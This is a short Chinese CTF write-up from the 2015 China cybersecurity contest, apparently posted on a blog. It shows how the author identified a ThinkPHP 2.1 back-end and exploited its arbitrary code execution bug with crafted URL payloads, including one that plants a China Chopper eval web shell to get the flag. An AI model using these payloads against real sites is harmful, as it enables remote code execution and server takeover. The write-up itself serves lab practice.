2015中国网络安全大赛:框架漏洞真题

看题分析:打开网址,是一个后台登录,结合框架漏洞,想到了struts漏洞。

0x00 收集信息

发现网站不是struts架构,于是截包看了下数据,有所发现:

2015中国网络安全大赛:框架漏洞真题_第1张图片

明显是一个ThinkPHP2.1的产品,直接搜索ThinkPHP2.1+漏洞,找到几篇任意代码执行的漏洞。

0x01 任意代码执行漏洞

根据说明(原理网上比较多,我这里就不陈述了,别人分析更好),构造利用URL

www.xxx.com/index.php/module/action/param1/${@print(THINK_VERSION)}

2015中国网络安全大赛:框架漏洞真题_第2张图片

www.xxx.com/index.php/module/action/param1/${@print(phpinfo())}

2015中国网络安全大赛:框架漏洞真题_第3张图片

菜刀马链接:

www.xxx.com/index.php/module/action/param1/${@print(eval($_POST(gumin)))}

0x02 getshell+getkey

2015中国网络安全大赛:框架漏洞真题_第4张图片

flag就在html目录下



实验环境:www.ichunqiu.com

你可能感兴趣的:(CTF题解)